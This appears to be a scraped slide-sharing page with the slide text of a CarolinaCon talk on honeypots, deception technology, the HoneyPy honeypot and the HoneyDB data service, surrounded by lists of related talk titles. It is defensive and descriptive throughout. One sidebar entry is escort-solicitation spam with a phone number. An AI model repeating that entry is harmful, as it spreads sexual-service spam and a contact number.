Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
 
Corporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing FeloniesCorporate Espionage without the Hassle of Committing Felonies
Corporate Espionage without the Hassle of Committing Felonies
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
 
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
Hacking Portugal , C-days 2016 , v1.0
Hacking Portugal , C-days 2016 , v1.0Hacking Portugal , C-days 2016 , v1.0
Hacking Portugal , C-days 2016 , v1.0
 
Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?
 
Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)Cyber Threat Hunting Training (CCTHP)
Cyber Threat Hunting Training (CCTHP)
 
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...
 

Ähnlich wie Honeypots, Deception, and Frankenstein

Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)Phillip Maddux
 
Security Opportunities A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC PerspectiveSecurity Opportunities A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC PerspectivePositive Hack Days
 
Year of pawnage - Ian trump
Year of pawnage - Ian trumpYear of pawnage - Ian trump
Year of pawnage - Ian trumpMAXfocus
 
Keynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfKeynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfDefconRussia
 
HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)Phillip Maddux
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.Kalpesh Doru
 
Introduction to Honeypots
Introduction to HoneypotsIntroduction to Honeypots
Introduction to HoneypotsEmil Tan
 
Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Eoin Keary
 
Cyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTCyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTSimone Onofri
 
CSA Raleigh application security and deception in the cloud
CSA Raleigh application security and deception in the cloudCSA Raleigh application security and deception in the cloud
CSA Raleigh application security and deception in the cloudPhillip Maddux
 
OWASP Québec: Threat Modeling Toolkit - Jonathan Marcil
OWASP Québec: Threat Modeling Toolkit - Jonathan MarcilOWASP Québec: Threat Modeling Toolkit - Jonathan Marcil
OWASP Québec: Threat Modeling Toolkit - Jonathan MarcilJonathan Marcil
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...ThreatReel Podcast
 
How I Learned to Stop Worrying and Love Building Data Products
How I Learned to Stop Worrying and Love Building Data ProductsHow I Learned to Stop Worrying and Love Building Data Products
How I Learned to Stop Worrying and Love Building Data ProductsAlejandro Correa Bahnsen, PhD
 
We cant hack ourselves secure
We cant hack ourselves secureWe cant hack ourselves secure
We cant hack ourselves secureEoin Keary
 
Defcamp 2013 - Does it pay to be a blackhat hacker
Defcamp 2013 - Does it pay to be a blackhat hackerDefcamp 2013 - Does it pay to be a blackhat hacker
Defcamp 2013 - Does it pay to be a blackhat hackerDefCamp
 
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hackerDan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hackerDan Vasile
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineLastline, Inc.
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primeramiable_indian
 
Asset Discovery in India – Redhunt Labs
Asset Discovery in India – Redhunt LabsAsset Discovery in India – Redhunt Labs
Asset Discovery in India – Redhunt LabsRedhuntLabs2
 

Ähnlich wie Honeypots, Deception, and Frankenstein (20)

Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)
 
Security Opportunities A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC PerspectiveSecurity Opportunities A Silicon Valley VC Perspective
Security Opportunities A Silicon Valley VC Perspective
 
Year of pawnage - Ian trump
Year of pawnage - Ian trumpYear of pawnage - Ian trump
Year of pawnage - Ian trump
 
Keynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfKeynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourself
 
HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)HoneyPy & HoneyDB (LASCON 2016)
HoneyPy & HoneyDB (LASCON 2016)
 
Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
 
Introduction to Honeypots
Introduction to HoneypotsIntroduction to Honeypots
Introduction to Honeypots
 
Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...Web security – application security roads to software security nirvana iisf...
Web security – application security roads to software security nirvana iisf...
 
Cyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTCyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APT
 
CSA Raleigh application security and deception in the cloud
CSA Raleigh application security and deception in the cloudCSA Raleigh application security and deception in the cloud
CSA Raleigh application security and deception in the cloud
 
OWASP Québec: Threat Modeling Toolkit - Jonathan Marcil
OWASP Québec: Threat Modeling Toolkit - Jonathan MarcilOWASP Québec: Threat Modeling Toolkit - Jonathan Marcil
OWASP Québec: Threat Modeling Toolkit - Jonathan Marcil
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
 
How I Learned to Stop Worrying and Love Building Data Products
How I Learned to Stop Worrying and Love Building Data ProductsHow I Learned to Stop Worrying and Love Building Data Products
How I Learned to Stop Worrying and Love Building Data Products
 
We cant hack ourselves secure
We cant hack ourselves secureWe cant hack ourselves secure
We cant hack ourselves secure
 
Defcamp 2013 - Does it pay to be a blackhat hacker
Defcamp 2013 - Does it pay to be a blackhat hackerDefcamp 2013 - Does it pay to be a blackhat hacker
Defcamp 2013 - Does it pay to be a blackhat hacker
 
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hackerDan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with LastlineReacting to Advanced, Unknown Attacks in Real-Time with Lastline
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primer
 
Asset Discovery in India – Redhunt Labs
Asset Discovery in India – Redhunt LabsAsset Discovery in India – Redhunt Labs
Asset Discovery in India – Redhunt Labs
 

Mehr von Phillip Maddux

The left is not wrong, just not right; It's time to shift right!
The left is not wrong, just not right; It's time to shift right!The left is not wrong, just not right; It's time to shift right!
The left is not wrong, just not right; It's time to shift right!Phillip Maddux
 
Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!Phillip Maddux
 
SecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operationsSecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operationsPhillip Maddux
 
Application security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOpsApplication security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOpsPhillip Maddux
 
HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)Phillip Maddux
 
HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)Phillip Maddux
 
HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)Phillip Maddux
 

Mehr von Phillip Maddux (7)

The left is not wrong, just not right; It's time to shift right!
The left is not wrong, just not right; It's time to shift right!The left is not wrong, just not right; It's time to shift right!
The left is not wrong, just not right; It's time to shift right!
 
Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!
 
SecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operationsSecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operations
 
Application security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOpsApplication security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOps
 
HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)
 
HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)
 
HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)
 

KĂŒrzlich hochgeladen

Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel AraĂșjo
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 

KĂŒrzlich hochgeladen (20)

Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 

Honeypots, Deception, and Frankenstein

  • 2. BIO Career Summary ● WebDev, DBA, SA, IT Auditor (~7 yrs) ● AppSec in Financials, EY & GS (~9 yrs) On the socials ● Twitter: @foospidy ● Github: http://github.com/foospidy ● LinkedIn: http://linkedin.pxmx.io ● Blog: http://pxmx.io Phillip Maddux Trusted AppSec Advisor and Senior Solutions Engineer @ Signal Sciences https://signalsciences.com CarolinaCon 14
  • 5. Agenda of the Cybers ● Honeypots 101 ● Cyber Deception ● HoneyPy - Quick Update ● Frankenstein (HoneyDB Project) ● Q&A
  • 6. Honeypots 101 A networked computer configured to look like a legitimate system, but its real purpose is to discover and/or track attackers. Types of Honeypots: - Production - Research Levels of Interaction: Low Emulated services, very limited interaction, no login capability (low risk). Medium Emulated services, emulated login, emulated commands. High Actual services, system logins, and commands (very risky).
  • 7. Honeypots 101 - Production Honeypots Production honeypots are computers on the network that have no legitimate business purpose and should never see any traffic, unless
 - Something is misconfigured on the network - A malicious actor on the network Production honeypots are an additional layer to your defense strategy. - Honeypot logs are low volume and high value - Honeypots introduce risk to the attacker
  • 8. Honeypots 101 - Production Honeypots Additional Layer to
 Preventative controls - Network & application firewalls - Intrusion prevention systems - Patch management - Network compartmentalization - Anti-virus Detective controls - Intrusion detection systems - Network traffic analysis - Endpoint monitoring Control validation - Vulnerability scans - Audits - Penetration testing - Control performance monitoring Honeypots - Produces low volumes of data compared to the volumes of data from all other preventative and detective controls
  • 9. Honeypots 101 - Research Honeypots Research honeypots can have many purposes, it just depends on what the research goals are. Examples: - Identify sources of malicious traffic - Discover active malware, botnets, and C&C servers - Learn about attacker techniques & tools
  • 10. Honeypots 101 - Research Honeypots Bots Scanners Malware DDoS Botnets etc. Internet
  • 11. Honeypots 101 - Research Honeypots ShmooCon 2015 Andrew Morris (@Andrew___Morris): No Budget Threat Intelligence - Tracking Malware Campaigns on the Cheap - Reversing malware - Uncovering c2 servers - Uncovering imminent ddos attacks Presentation video Now doing really cool stuff with
 (https://greynoise.io/)
  • 12. Honeypots 101 - Hobbyist Honeypots - Try it out. - It’s fun! This is not me. (this is totally me)
  • 14. The First Rule of Cyber Deception
  • 15. Image Source You Must Show This Image
  • 16. Deception Deception technology automates the creation of traps (decoys) and/or lures which are mixed among and within existing IT resources to provide a layer of protection to stop attackers that have penetrated the network. Traps (decoys) are IT assets that either use real licensed operating system software, or are emulations of these devices. [1] 1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
  • 17. Deception Automation Automation for: - Deploying deception endpoints as VMs, containers, or processes. - Configuration of deception endpoints. Centralized management interface, or API driven.
  • 18. Deception Lures Lures (aka breadcrumbs) - Lures are generally real information technology resources (files of varying kinds) which are placed on actual IT assets. [1] - Credentials to network resources or applications. - Shortcuts to applications or other services, e.g. FTP, Telnet, SSH. - Browser artifacts, e.g. history, favorites, cookies. - Database connection strings - Network drives - etc. 1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
  • 19. Deception Solutions Very fancy implementations of honeypots
  • 20. Deception Layers Network services - SSH, Telnet, FTP, etc. Applications - cookies, directories, logins, functionality, etc. Data - watermarks, triggers, records access, etc.
  • 21. Deception in Applications 2017 Herb Todd: Tangled Web: Defense in Deception - The goals of deception from the perspective of both the attacker and defender - The elements and processes needed to plan, prepare, execute, and monitor effective deception - The types of deception techniques that are effective and how they translate into actual web application capabilities - How to identify and respond to various types of attackers. Presentation video My takeaway - a tailored solution is needed
  • 23. Deception Goal Integrate deception throughout your network and applications so you become a high risk to attackers
  • 24. Deception Market Approximately 20 companies Raised at least 201 million dollars Top 5 funded range 19 million to 46 million 2 acquisitions All this over the last 4, maybe 5 years Numbers based on data from crunchbase.com as of Fall 2017
  • 25. Deception Challenges The concept of honeypots & deception has been around for years The Cuckoo’s Egg - 1989 Bsides Raleigh 2017 (now Bsides RDU) source
  • 26. Deception Challenges Why isn’t everyone already doing deception?
  • 28. Deception Challenges Over the last 10 to 15 years organizations have focused on getting the basics done
 ● Vulnerability Assessment ● Patch Management ● Endpoint protection ● Network Monitoring (IDS/IPS) ● Controls Validation ● Security awareness / training Deception ● No resources ● Not a priority ● Not fully understood
  • 29. Deception Challenges However, as organizations are becoming more mature in their security programs they are now thinking about deception
 What does a deception program look like for their organization?
  • 30. Deception Program Initial thoughts
 ● Scope
 intruder vs. insider, or both? ● Output... alerts vs. counter intelligence, or both? ● Coverage
 external vs. internal, or both? ● Assets
 network, applications, data? ● Validation
 metrics and testing. ● Incident response
 integration and prioritization. Audit & Compliance?
  • 31. Deception Challenges Some other challenges
 ● Some existing solutions are heavy to deploy. ● Lures & breadcrumb management. ● Vulnerability scans reporting on sensors. ● Deception data risk (data is fake, incident is real). ● External facing deception can have an impact on security scorecard. ● How to implement deception in 3rd party vendor environments.
  • 32. Deception Takeaways Get the basics covered first Think about your deception story (program) Investigate solutions that are right sized for your organization’s maturity level A solution needs to: - have capability to be tailored - be easy to deploy - be easy to automate and integrate - be light weight / low touch to manage
  • 35. HoneyPy - Low to medium interaction honeypot. - Plugin based to implement various network services (tcp or udp). - Open source, on Github https://github.com/foospidy/HoneyPy - Written in Python. - Plugins - https://github.com/foospidy/HoneyPy/tree/master/plugins - Service config - https://github.com/foospidy/HoneyPy/blob/master/etc/services.cfg - Integrations (loggers) - https://github.com/foospidy/HoneyPy/tree/master/loggers June Meetup
  • 36. HoneyDB HoneyDB is a community driven honeypot data aggregation service. HoneyDB collects and publishes honeypot data via its web site and APIs. honeydb.io (redirects to riskdiscovery.com/honeydb)
  • 37. HoneyDB - Features Data visualization

  • 39. HoneyDB - Features Threat Info API - Bad-hosts - Sensor Data - Twitter Threat Feed Tools
 API Wrapper / CLI https://github.com/foospidy/honeydb-python Console https://github.com/NullArray/Mimir
  • 41. HoneyDB - Original Architecture Web API
  • 42. HoneyDB - Scale Problem Web API
  • 43. HoneyDB - Reliability Problem Fun reading
 http://www.cloudatacost.com/mystory https://www.reddit.com/r/CloudAtCost/
  • 44. HoneyDB - $$$? Decent web servers and data storage could run about $400-$500 per month. Current 90 day storage 50 GB
  • 45. HoneyDB - How To Get $$$? Idea
 Honeypots As A Service (HaaS)
  • 46. HoneyDB - How To Get $$$? Idea
 Honeypots As A Service (HaaS)
  • 47. HoneyDB - You Have To HaaS it!
  • 48. HoneyDB - Turns Out
 You Don’t Have To HaaS it! Or nobody wants to HaaS it =(
  • 49. HoneyDB - But Wait, CarolinaCon Connection! http://novcon.net/ Offered VMs for free! btw
 they also operate the threat info project.
  • 50. HoneyDB - Reliable Servers But still need to scale
  • 52. HoneyDB - Frankenstein Cloud Architecture “Frankenstein scaaaaaaaaaaaaale” - Frankenstein
  • 53. HoneyDB - Frankenstein Cloud Architecture
  • 54. HoneyDB - Frankenstein Cloud Architecture Serverless (functions) Google Cloud BigQuery PubSub Novcon VMs Honeydb web / api MySQL (Secondary) MySQL (Primary) get hmac post events post eventspull events pull tweets TBD replicate query inserts stream events
  • 55. HoneyDB - What about... Blockchain?
  • 57. HoneyDB - Note On Serverless Functions IBM Cloud Functions is THE BEST - deploy easily/quickly, lowest cost. AWS Lambda is good - robust, but expensive
 API gateway charges. Google Cloud Functions is disappointing - easy to deploy, only nodejs, but
 Google functions using Google library talking to Google PubSub resulted in tons of errors. Wait. What? Why? Azure Cloud Functions is WTF - couldn’t get dependencies to install, never got it running, couldn’t waste more time with it.
  • 58. HoneyDB - Ok, So What Does It Cost?
  • 59. HoneyDB - Ok, So What Does It Cost?
  • 60. HoneyDB - How To Money? Cryptocurrency Mining...
  • 61. HoneyDB - How To Money? Not practical, but wrote a cool script... HoneyMiner https://github.com/foospidy/HoneyMiner
  • 62. HoneyDB - How To Money? Masternodes
